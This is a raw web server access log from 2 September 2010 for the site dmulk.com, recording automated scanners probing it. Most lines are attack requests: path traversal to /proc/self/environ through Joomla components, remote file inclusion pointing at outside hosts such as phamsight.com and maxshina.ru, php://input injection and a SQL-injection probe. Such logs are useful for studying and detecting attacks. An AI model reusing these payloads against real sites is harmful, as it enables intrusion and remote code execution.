217.22.60.40 - - [02/Sep/2010:10:04:35 -0700] "GET /logs/access_100601.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:04:36 -0700] "GET /logs/access_090807.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:04:36 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:04:37 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:04:47 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:04:50 -0700] "GET /logs/access_080428.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:04:50 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68550 "-" "Mozilla/5.0" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:05:02 -0700] "GET /logs/access_100601.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:05:04 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:05:05 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:05:18 -0700] "GET /logs/access_081105.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:06:35 -0700] "GET /logs/access_100825.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:06:37 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:06:39 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
64.157.4.42 - - [02/Sep/2010:10:06:39 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.2; http://dmulk.com/blog" "dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:06:54 -0700] "GET /logs/access_100824.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:06:55 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:06:56 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:07:08 -0700] "GET /logs/access_091213.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:07:09 -0700] "GET /logs/access_100824.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:07:10 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:07:11 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:07:38 -0700] "GET /logs/access_100822.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:07:38 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:07:39 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:10:08:02 -0700] "GET /logs/access_090917.log HTTP/1.0" 200 2471621 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.0.81.185 - - [02/Sep/2010:10:08:28 -0700] "GET /logs/index1.php?page=http://127.0.0.1/r0x.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
87.0.81.185 - - [02/Sep/2010:10:08:28 -0700] "GET /logs/access_100401.log/index1.php?page=http://127.0.0.1/r0x.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
87.0.81.185 - - [02/Sep/2010:10:08:28 -0700] "GET /index1.php?page=http://127.0.0.1/r0x.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
87.0.81.185 - - [02/Sep/2010:10:08:30 -0700] "GET /logs/access_090422.log/index1.php?page=http://127.0.0.1/r0x.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:10:08:31 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:10:08:31 -0700] "POST /logs/access_091225.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:10:08:33 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:08:54 -0700] "GET /logs/access_100822.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:08:55 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:08:56 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:09:17 -0700] "GET /logs/access_100101.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:09:17 -0700] "GET /logs/access_100101.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:09:17 -0700] "GET /logs/access_100101.log//?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:09:17 -0700] "POST /logs/access_100101.log//?option=com_agora&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:09:17 -0700] "GET /logs/access_100101.log//?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:10:29 -0700] "GET /logs/access_100824.log/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:10:29 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:10:29 -0700] "GET /logs/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:10:45 -0700] "GET /logs/access_100824.log/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:10:45 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:10:46 -0700] "GET /logs/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:10:50 -0700] "GET /logs/access_100824.log/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:10:50 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:10:53 -0700] "GET /logs/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:10:59 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:11:00 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:11:05 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:11:09 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:11:12 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:11:16 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
79.174.72.86 - - [02/Sep/2010:10:11:18 -0700] "GET /index.php?sbjoke_id=' HTTP/1.1" 200 68368 "-" "libwww-perl/5.810" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:11:19 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:11:27 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:11:31 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:11:33 -0700] "GET /index.php?sbjoke_id=' HTTP/1.1" 200 68368 "-" "libwww-perl/5.810" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:11:38 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:11:41 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:11:50 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:11:52 -0700] "GET /logs/access_100101.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:11:55 -0700] "GET /logs/access_100101.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:11:55 -0700] "GET /logs/access_100101.log//?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:11:56 -0700] "POST /logs/access_100101.log//?option=com_agora&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:11:56 -0700] "GET /logs/access_100101.log//?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:11:58 -0700] "GET /logs/access_090815.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:12:06 -0700] "GET /logs/access_100824.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:12:07 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:12:08 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:12:11 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:12:12 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:12:14 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:12:30 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:12:33 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:12:43 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
198.106.183.7 - - [02/Sep/2010:10:12:43 -0700] "POST /logs/access_100611.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
198.106.183.7 - - [02/Sep/2010:10:12:43 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
198.106.183.7 - - [02/Sep/2010:10:12:46 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:12:50 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:12:51 -0700] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:12:51 -0700] "GET /logs/access_090130.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:12:51 -0700] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68477 "-" "Mozilla/5.0" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:12:58 -0700] "GET /logs/access_100610.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:12:59 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:13:01 -0700] "GET /logs/access_100115.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:13:02 -0700] "GET /logs/access_090130.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:13:02 -0700] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:13:02 -0700] "GET /logs/access_090527.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:13:02 -0700] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68477 "-" "Mozilla/5.0" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:13:03 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:13:03 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:13:06 -0700] "GET /logs/access.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:13:07 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.813" "dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:13:08 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:13:09 -0700] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:13:09 -0700] "GET /logs/access_090130.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:13:09 -0700] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68477 "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:13:10 -0700] "GET /logs/access_090130.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:13:10 -0700] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68477 "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:13:14 -0700] "GET /logs/access_090130.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:13:17 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:10:13:17 -0700] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
